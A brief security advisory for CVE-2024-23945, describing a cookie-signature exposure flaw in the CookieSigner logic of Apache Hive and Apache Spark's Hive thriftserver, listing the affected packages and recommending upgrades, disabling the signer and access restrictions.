CVE-2024-23945

Name of the Vulnerable Software and Affected Versions Apache Hive versions 1.2.0 and later Apache Spark versions 2.0.0 and later

Description The issue is related to the exposure of digital signatures in cookie data, which can lead to security vulnerabilities and exploitation. The vulnerable CookieSigner logic was introduced in Apache Hive and Apache Spark, allowing malicious actors to modify cookie values. The affected components include org.apache.hive:hive-service, org.apache.spark:spark-hive-thriftserver 2.11, and org.apache.spark:spark-hive-thriftserver 2.12. Exposing the correct cookie signature can lead to further exploitation.

Recommendations For Apache Hive version 1.2.0 and later, update to a version that fixes the vulnerable CookieSigner logic. For Apache Spark version 2.0.0 and later, update to a version that fixes the vulnerable CookieSigner logic. As a temporary workaround, consider disabling the CookieSigner function until a patch is available. Restrict access to the affected components, including org.apache.hive:hive-service, org.apache.spark:spark-hive-thriftserver 2.11, and org.apache.spark:spark-hive-thriftserver 2.12, to minimize the risk of exploitation.